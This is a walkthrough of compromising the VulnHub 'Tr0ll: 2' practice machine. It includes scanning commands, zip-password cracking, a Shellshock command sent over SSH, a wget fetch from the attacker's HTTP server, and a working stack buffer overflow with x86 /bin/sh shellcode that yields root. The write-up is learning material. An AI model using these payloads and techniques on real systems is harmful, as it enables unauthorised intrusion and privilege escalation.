VulnHub: Tr0ll: 2

8 min readApr 22, 2021


Initial Foothold

  1. Network discovery
nmap -sn

My target is

2. Port scan

nmap -Pn -Pn -p1000-

3. OS and service scan

nmap -A -p21,22,80

There’re 3 services: ftp, ssh, and http.

4. Vuln scan

nmap --script vuln -p21,22,80

There’s a ‘robots.txt’ file.

Service Enumeration

There’re 3 TCP services:

  • 21/tcp ftp vsftpd 2.0.8 or later



There’s a banner.

  • 22/tcp ssh OpenSSH 5.9p1 Debian 5ubuntu1.4


  • 80/tcp http Apache httpd 2.2.22 ((Ubuntu))
  1. Nikto scan
nikto -h

2. Directory scan

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u -x php,txt,html,sh,cgi -q

3. Access the site

View page source. There’s a possible username: Tr0ll.

Save it as ‘user.txt’ in case I need to use it.

Access robots.txt

Copy only directory list and save it as ‘robots_fix.txt’

4. Enum site’s directory w/ robots_fix.txt

gobuster dir --wordlist http/robots_fix.txt -u -x php,txt,html,sh,cgi -q

There are only 4 directories that I can access. Others are trolls.

I started w/ ‘ok_this_is_it’. There’s a page w/ one image.

View page source

Save the image and analyze its metadata

exiftool cat_the_troll.jpg

The file size is 15 KiB.

Search for any hidden messages.


I kept repeating the steps of all path, ’til /dont_bother/

I noticed that its file size is 16 KiB which is different from others.

Use ‘strings’ to search for hidden message and there it is.

6. Access ‘y0ur_self’

There’s an ‘answer.txt’ file.

Read it. It is base-64 encoded strings. Some of them are the same string.

Download it.


Remove redundancy string.

sort answer.txt | uniq > new_answer.txtcat new_answer.txt

Now It is better.

Decode it w/ cyberchef. It can import files, so it is super convenient. After decoding, I saved it as ‘decoded_answer.txt’.

Read the file

cat decoded_answer.txt

It’s a password for something.

Find an access to the machine

Now that I don't have any shell yet. There’re 2 services that need credentials: FTP and SSH.

So far I have one username: Tr0ll and a list of passwords.

  1. Starting w/ FTP, connect to the service again.

Sometimes FTP user doesn't require a password.

ftp Tr0llpassword: (empty)


Use the same username and password to log in. This time I succeeded.

username: Tr0llpassword: Tr0llls -la

There’s ‘’.

Download it


Unzip it.


I stuck w/ password requiring.

Crack it w/ fcrackzip. I already have passwords that I can use to crack

fcrackzip -u -v -D -p http/y0ur_self/decoded_answer.txt

Now I got the password.

unzip lmao.zippassword: <cracked password>ls

I got the new file, ‘noob’.

Read it

cat noob

It’s a private key for SSH service.

2. Login to SSH service

Change noob permission

chmod 600 noob

Starting w/ ‘Tr0ll’

ssh -i noob Troll@

It still requires a password.

I guess that username may be ‘noob’. Let’s change the username to ‘noob’

ssh -i noob noob@

The connection was closed immediately after logging in.

Try shellshock technique w/ SSH

ssh -i noob noob@ '() { :;}; /bin/bash'idpython -c 'import pty;pty.spawn("/bin/bash");'

Now I got the shell. And I need TTY shell to work around the machine.

Privilege Escalation

  1. Explore directories as listed:

I don't find anything in these directories.

2. Verify sudo permission

sudo -l

I need a password.


Prepare HTTP server on the attacker machine

python -m SimpleHTTPServer 80

Download it

cd /tmpwget 777

Run it


From the bottom to the top. Here are the things that I’ve found interesting.

noob’s ‘.bash_history’. Maybe a hint to Buffer Overflow (bof).

SUID files. The last 3 records are the leads.

Access it

cd /nothing_to_see_here/choose_wiselyls -la

There’re 3 directories.


cd door1ls -la

There’s r00t.


cd ../door2ls -la

There’s r00t.


cd ../door3ls -la

There’s r00t.

Try run it


My connection is closed after few seconds. I have to repeat the connection step.

Let’s try door2


I have to supply input.

./r00t test

Maybe I can do the buffer overflow.

Buffer Overflow

  1. fuzzing
./r00t $(python -c 'print "A"*500' )

There’s a segmentation fault. I can proceed to the next step

2. Find EIP offset

Create a pattern of 500 characters

msf-pattern_create -l 500

Open r00t w/ gdb

gdb ./r00t

Supply the created pattern

r <created pattern>

EIP address is 0x6a413969

Find the offset

msf-pattern_offset -l 500 -q <EIP address>in my case:msf-pattern_offset -l 500 -q 6a413969

EIP offset is 268.

3. Find ESP address

Back to the gdb

i r esp

The esp address is ‘0xbffffac0’

4. Overwriting EIP and confirm the offset

Quit the gdb and restart the program


After quitting r00t is dissappeared.

List the file.

ls -la


Try to run r00t in door3


Back to door2

ls -la

Permission denied

Now I think that this machine has some hidden script to troll w/ me as making it harder, cease the connection, and make the file disappear.

I can use another command to verify this directory

stat r00t

Now I got the same file.

Open w/ gdb

gdb ./r00t

Confirm the offset

r $(python -c 'print "A"*<offset number> + "B"*4' )in mycase:r $(python -c 'print "A"*268 + "B"*4' )

Now I got 0x42424242 (“B*4”), which means the offset is correct.

5. Exploitation

I got the /bin/sh shellcode from here:

./r00t $(python -c 'print "A"*<offset number> +   "<ESP address>" + "\x90" * 10 + "<shellcode>"')in my case:./r00t $(python -c 'print "A"*268 +   "\xc0\xfa\xff\xbf" + "\x90" * 10 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')

NOTE: “\x90” * 10 is NOPS.


Now, I’m root.

cd /rootls -lacat Proof.txt